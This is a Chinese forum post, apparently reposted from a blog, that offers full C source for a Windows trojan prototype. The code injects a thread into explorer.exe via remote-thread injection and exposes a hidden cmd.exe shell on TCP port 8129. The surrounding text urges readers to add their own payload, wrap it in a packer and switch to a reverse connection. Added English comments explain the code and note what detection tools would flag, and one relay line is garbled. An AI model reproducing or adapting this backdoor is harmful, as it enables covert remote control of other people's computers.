一个简单的木马原型基础代码 [复制链接]

发表于 2007-10-03 13:11 |只看该作者 |倒序浏览

因为木马采用了 正向连接模式 所以请大家修改下代码改成反相连接或端口复用的比较好……(不知道说的对不对…… )
原文:
添加上自己的XXX,加上变态的壳,做点小修改,就可以.....
#include
#pragma comment(lib,"ws2_32.lib")
#include
#include
#pragma comment(lib,"Shlwapi.lib")
#include
#include
#include
// Parameter structure.
// Everything the injected thread (ThreadProc) needs is carried in this block, because
// the copied function cannot rely on the target process's import table: resolved API
// addresses plus the few strings it uses. WinMain fills it in the injector and copies it
// verbatim into the target with WriteProcessMemory. Addresses are stored as DWORD, so as
// written this only fits a 32-bit process.
typedef struct _RemotePara
{
   // kernel32 addresses resolved by WinMain; only dwLoadLibrary is actually called by
   // ThreadProc, the other three are stored but unused there.
   DWORD dwLoadLibrary;
   DWORD dwFreeLibrary;
   DWORD dwGetProcAddress;
   DWORD dwGetModuleHandle;
   // Winsock (wsock32.dll) entry points used for the listening socket and relay.
   DWORD dwWSAStartup;
   DWORD dwSocket;
   DWORD dwhtons;
   DWORD dwbind;
   DWORD dwlisten;
   DWORD dwaccept;
   DWORD dwsend;
   DWORD dwrecv;
   DWORD dwclosesocket;
   // kernel32 entry points for the child process and its pipes.
   DWORD dwCreateProcessA;
   DWORD dwPeekNamedPipe;
   DWORD dwWriteFile;
   DWORD dwReadFile;
   DWORD dwCloseHandle;
   DWORD dwCreatePipe;
   DWORD dwTerminateProcess;   // resolved but never called in ThreadProc
   DWORD dwMessageBox;         // user32!MessageBoxA; its only use is commented out
   char strMessageBox[12];     // text for the (commented-out) message box
   char winsockDll[16];        // DLL name passed to LoadLibrary inside the target
   char cmd[10];               // command line handed to CreateProcessA
   char Buff[4096];            // shared relay buffer between socket and pipes
   char telnetmsg[60];         // banner; its only use is commented out
}RemotePara;
// Enable a named privilege (WinMain uses SE_DEBUG_NAME) on a token; defined below.
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);
  
// Look up a process ID by image-name prefix; defined below.
DWORD GetPidByName(char *szName);
// Remote thread body.
// The raw bytes of this function are copied into the target process by WinMain and run
// there with Para pointing at the RemotePara block WinMain also copied over. Every API
// call below therefore goes through an address stored in Para rather than through the
// local import table, and the calls are made via untyped FARPROC pointers (no argument
// checking by the compiler). As written, the thread:
//   - loads Para->winsockDll in the target and initialises Winsock 2.1;
//   - binds a TCP listening socket to INADDR_ANY:8129 and accepts exactly one client;
//   - creates two anonymous pipes and starts Para->cmd hidden, with its stdin, stdout and
//     stderr redirected to those pipes (handles inherited);
//   - loops forever relaying child output to the socket and socket input to the child,
//     leaving the loop only when a ReadFile/send/WriteFile call fails.
// Detection-relevant behaviour visible here: a listening socket on TCP/8129 owned by a
// process that has no reason to listen, and that process spawning a hidden child with
// inherited pipe handles. Returns 0 on every path; WinMain never reads the exit code.
DWORD __stdcall ThreadProc(RemotePara *Para)
{
WSADATA WSAData;
WORD nVersion;
SOCKET listenSocket;
SOCKET clientSocket;
struct sockaddr_in server_addr;
struct        sockaddr_in client_addr;
int iAddrSize = sizeof(client_addr);
SECURITY_ATTRIBUTES sa;
HANDLE hReadPipe1;
HANDLE hWritePipe1;
HANDLE hReadPipe2;
HANDLE hWritePipe2;
STARTUPINFO si;
PROCESS_INFORMATION ProcessInformation;
unsigned long lBytesRead = 0;
// Typed views of the four kernel32 addresses; only LoadLibraryFunc is used below.
typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);
FARPROC PMessageBoxA;
FARPROC PWSAStartup;
FARPROC PSocket;
FARPROC Phtons;
FARPROC Pbind;
FARPROC Plisten;
FARPROC Paccept;
FARPROC Psend;
FARPROC Precv;
FARPROC Pclosesocket;
FARPROC PCreateProcessA;
FARPROC PPeekNamedPipe;
FARPROC PWriteFile;
FARPROC PReadFile;
FARPROC PCloseHandle;
FARPROC PCreatePipe;
FARPROC PTerminateProcess;
PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary;
PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress;
PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary;
PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle;
// Make sure the Winsock DLL is mapped in the target before its addresses are used.
LoadLibraryFunc(Para->winsockDll);
PWSAStartup   = (FARPROC)Para->dwWSAStartup;
PSocket       = (FARPROC)Para->dwSocket;
Phtons        = (FARPROC)Para->dwhtons;
Pbind         = (FARPROC)Para->dwbind;
Plisten       = (FARPROC)Para->dwlisten;
Paccept       = (FARPROC)Para->dwaccept;
Psend         = (FARPROC)Para->dwsend;
Precv         = (FARPROC)Para->dwrecv;
Pclosesocket  = (FARPROC)Para->dwclosesocket;
PCreateProcessA    = (FARPROC)Para->dwCreateProcessA;
PPeekNamedPipe     = (FARPROC)Para->dwPeekNamedPipe;
PWriteFile         = (FARPROC)Para->dwWriteFile;
PReadFile          = (FARPROC)Para->dwReadFile;
PCloseHandle       = (FARPROC)Para->dwCloseHandle;
PCreatePipe        = (FARPROC)Para->dwCreatePipe;
PTerminateProcess  = (FARPROC)Para->dwTerminateProcess;
PMessageBoxA       = (FARPROC)Para->dwMessageBox;
// Winsock 2.1; the WSAStartup result is not checked.
nVersion = MAKEWORD(2,1);
PWSAStartup(nVersion, (LPWSADATA)&WSAData);
listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
if(listenSocket == INVALID_SOCKET)return 0;
// Listen on every local interface, TCP port 8129 (hard-coded).
server_addr.sin_family      = AF_INET;
server_addr.sin_port        = Phtons((unsigned short)(8129));
server_addr.sin_addr.s_addr = INADDR_ANY;
if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
if(Plisten(listenSocket, 5))return 0;
// Blocks until one client connects; the accept result is not validated.
clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
// Psend(clientSocket, Para->telnetmsg, 60, 0);
// Pipe 1: child stdout/stderr -> this thread.  Pipe 2: this thread -> child stdin.
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;
ZeroMemory(&si,sizeof(si)); // ZeroMemory is a C runtime function and can be called directly (author's note)
// Hidden window, standard handles redirected to the pipe ends created above.
si.dwFlags     = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput   = hReadPipe2;
si.hStdOutput  = si.hStdError = hWritePipe1;
// bInheritHandles = 1 so the child sees the pipe handles; Para->cmd is the command line.
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;
// Relay loop: PeekNamedPipe is non-blocking, so child output is forwarded whenever it is
// available; otherwise the thread blocks in recv and feeds socket data to the child.
while(1) {
  memset(Para->Buff,0,4096);
  PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
  if(lBytesRead) {
   if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
   if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
  }else {
   lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
   // NOTE(review): the next line is garbled in this copy of the page; the middle of the
   // statement (the recv result check and the start of the WriteFile call) is missing.
   if(lBytesRead Buff, lBytesRead, &lBytesRead, 0))break;
  }
}
// Cleanup after the relay loop breaks. The child's handles in ProcessInformation are
// neither closed nor terminated here (PTerminateProcess is resolved but never used).
PCloseHandle(hWritePipe2);
PCloseHandle(hReadPipe1);
PCloseHandle(hReadPipe2);
PCloseHandle(hWritePipe1);
Pclosesocket(listenSocket);
Pclosesocket(clientSocket);
// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);
return 0;
}
// Injector entry point. As written it:
//   1. enables SeDebugPrivilege on its own token (EnablePrivilege),
//   2. finds a process whose image name starts with "EXPLORER.EXE" (GetPidByName) and
//      opens it with PROCESS_ALL_ACCESS,
//   3. allocates THREADSIZE bytes of PAGE_EXECUTE_READWRITE memory in that process and
//      copies the bytes starting at ThreadProc into it, without verifying that the
//      function is contiguous or fits in THREADSIZE,
//   4. resolves the API addresses ThreadProc needs from kernel32/wsock32/user32 in this
//      process and copies them, plus a few strings, into the target as a RemotePara
//      (presumably relying on those DLLs being mapped at the same addresses in the
//      target; nothing checks this),
//   5. starts ThreadProc in the target with CreateRemoteThread and then spins forever.
// The VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread sequence against
// another process is the classic remote-thread injection pattern that endpoint monitoring
// alerts on; SeDebugPrivilege being enabled by a non-debugger is a second signal, and the
// busy loop at the end leaves this process resident at full CPU.
// Returns 0 on every early-exit path; the normal path never returns.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
const DWORD THREADSIZE=1024*4;   // bytes copied for ThreadProc, not its measured size
DWORD byte_write;                // receives the remote thread id (last CreateRemoteThread argument)
void *pRemoteThread;
HANDLE hToken,hRemoteProcess,hThread;
HINSTANCE hKernel,hUser32,hSock;
RemotePara myRemotePara,*pRemotePara;
DWORD pID;
// Results of OpenProcessToken/EnablePrivilege are not checked.
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
// Get a handle to the chosen process, requesting PROCESS_ALL_ACCESS.
pID = GetPidByName("EXPLORER.EXE");
if(pID == 0)return 0;
hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
if(!hRemoteProcess)return 0;
// Allocate virtual memory in the remote process address space (readable, writable and executable).
pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!pRemoteThread)return 0;
// Write the thread body ThreadProc into the remote process: a raw THREADSIZE-byte copy
// starting at the function's address.
if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0;
// Resolve in this process every address the remote thread will call through.
ZeroMemory(&myRemotePara,sizeof(RemotePara));
hKernel = LoadLibrary( "kernel32.dll");
myRemotePara.dwLoadLibrary      = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
myRemotePara.dwFreeLibrary      = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
myRemotePara.dwGetProcAddress   = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
myRemotePara.dwGetModuleHandle  = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");
myRemotePara.dwCreateProcessA     = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
myRemotePara.dwPeekNamedPipe      = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
myRemotePara.dwWriteFile          = (DWORD)GetProcAddress(hKernel, "WriteFile");
myRemotePara.dwReadFile           = (DWORD)GetProcAddress(hKernel, "ReadFile");
myRemotePara.dwCloseHandle        = (DWORD)GetProcAddress(hKernel, "CloseHandle");
myRemotePara.dwCreatePipe         = (DWORD)GetProcAddress(hKernel, "CreatePipe");
myRemotePara.dwTerminateProcess   = (DWORD)GetProcAddress(hKernel, "TerminateProcess");
hSock = LoadLibrary("wsock32.dll");
myRemotePara.dwWSAStartup   = (DWORD)GetProcAddress(hSock,"WSAStartup");
myRemotePara.dwSocket       = (DWORD)GetProcAddress(hSock,"socket");
myRemotePara.dwhtons        = (DWORD)GetProcAddress(hSock,"htons");
myRemotePara.dwbind         = (DWORD)GetProcAddress(hSock,"bind");
myRemotePara.dwlisten       = (DWORD)GetProcAddress(hSock,"listen");
myRemotePara.dwaccept       = (DWORD)GetProcAddress(hSock,"accept");
myRemotePara.dwrecv         = (DWORD)GetProcAddress(hSock,"recv");
myRemotePara.dwsend         = (DWORD)GetProcAddress(hSock,"send");
myRemotePara.dwclosesocket  = (DWORD)GetProcAddress(hSock,"closesocket");
hUser32 = LoadLibrary("user32.dll");
myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");
// The buffers were zeroed above, so strcat behaves like a copy; the literals are not
// checked against the fixed field widths in RemotePara.
strcat(myRemotePara.strMessageBox,"Sucess!\\0");
strcat(myRemotePara.winsockDll,"wsock32.dll\\0");
strcat(myRemotePara.cmd,"cmd.exe\\0");
strcat(myRemotePara.telnetmsg,"Connect Sucessful!\\n\\0");
// Write the parameter block into the target process (read/write memory this time).
pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
if(!pRemotePara)return 0;
if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;
// Start the thread in the target; hThread is never checked or waited on.
hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
// Spins forever: everything after this loop is unreachable as written.
while(1) {}
FreeLibrary(hKernel);
FreeLibrary(hSock);
FreeLibrary(hUser32);
CloseHandle(hRemoteProcess);
CloseHandle(hToken);
return 0;
}
// Enable (fEnable != 0) or disable the privilege named szPrivName on hToken.
// WinMain calls this with SE_DEBUG_NAME so that OpenProcess on another process succeeds;
// enabling that privilege is a commonly audited event. The results of
// LookupPrivilegeValue and AdjustTokenPrivileges are not checked directly; success is
// judged by GetLastError() == ERROR_SUCCESS afterwards, which is how AdjustTokenPrivileges
// reports a privilege it could not assign (ERROR_NOT_ALL_ASSIGNED) even when it returns TRUE.
// Returns TRUE when GetLastError() reports no error after the adjustment.
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
// Attributes 0 clears the enabled flag, i.e. disables the privilege.
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
}
// Return the PID of the first process, in Toolhelp snapshot order, whose image name
// begins with szName. The comparison is case-insensitive and covers only strlen(szName)
// characters (StrCmpNI from shlwapi), so it is a prefix match, not an exact one.
// Returns 0 when the snapshot cannot be taken, Process32First fails, or nothing matches.
// Assumes an ANSI build: pe32.szExeFile is TCHAR and szName is char* — TODO confirm.
DWORD GetPidByName(char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32={0};
DWORD dwRet=0;
hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);   // required before Process32First
if(Process32First(hProcessSnap, &pe32))
{
  do
  {
   // Prefix match over strlen(szName) characters, case-insensitive.
   if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)
   {
    dwRet=pe32.th32ProcessID;
    break;
   }
  }while (Process32Next(hProcessSnap,&pe32));
}
// NOTE(review): this path returns without closing hProcessSnap (handle leak).
else return 0;
if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
return dwRet;
}

本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u1/36708/showart_394229.html